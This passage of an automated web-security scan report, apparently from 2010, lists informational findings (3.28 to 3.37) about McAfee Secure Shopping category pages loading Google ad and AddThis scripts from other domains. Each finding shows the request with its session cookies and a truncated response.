<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Shampoo at McAfee Secure Shopping - Search, Discover & Compa
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.28. http://secureshopping.mcafee.com/browse/baby/bathing/soap/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bathing/soap/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/bathing/soap/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:06 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:06 GMT
Content-Length: 68962

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Soap at McAfee Secure Shopping - Search, Discover & Compare
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.29. http://secureshopping.mcafee.com/browse/baby/bathing/washcloths/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bathing/washcloths/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/bathing/washcloths/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:07 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:07 GMT
Content-Length: 62347

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Washcloths at McAfee Secure Shopping - Search, Discover & Co
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.30. http://secureshopping.mcafee.com/browse/baby/bedding/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bedding/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/bedding/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:57 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:57 GMT
Content-Length: 55820

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Linens & Bedding at McAfee Secure Shopping - Search, Discove
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.31. http://secureshopping.mcafee.com/browse/baby/bedding/bedskirts/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bedding/bedskirts/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/bedding/bedskirts/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:01 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:01 GMT
Content-Length: 70440

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Bedskirts at McAfee Secure Shopping - Search, Discover & Com
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.32. http://secureshopping.mcafee.com/browse/baby/bedding/blankets/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bedding/blankets/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/bedding/blankets/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:01 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:01 GMT
Content-Length: 63321

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Blankets at McAfee Secure Shopping - Search, Discover & Comp
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.33. http://secureshopping.mcafee.com/browse/baby/bedding/bumper-pads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bedding/bumper-pads/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/bedding/bumper-pads/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:04 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:04 GMT
Content-Length: 68127

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Bumper Pads at McAfee Secure Shopping - Search, Discover & C
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.34. http://secureshopping.mcafee.com/browse/baby/bedding/comforters/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bedding/comforters/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/bedding/comforters/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:08 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:08 GMT
Content-Length: 57910

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Comforters at McAfee Secure Shopping - Search, Discover & Co
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.35. http://secureshopping.mcafee.com/browse/baby/bedding/crib-sets/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bedding/crib-sets/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/bedding/crib-sets/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:08 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:08 GMT
Content-Length: 66350

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Crib Sets at McAfee Secure Shopping - Search, Discover & Com
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.36. http://secureshopping.mcafee.com/browse/baby/bedding/hooded-towels/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bedding/hooded-towels/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/bedding/hooded-towels/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:09 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:09 GMT
Content-Length: 63582

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Hooded Towels at McAfee Secure Shopping - Search, Discover &
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.37. http://secureshopping.mcafee.com/browse/baby/bedding/mattress-pads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bedding/mattress-pads/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/bedding/mattress-pads/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
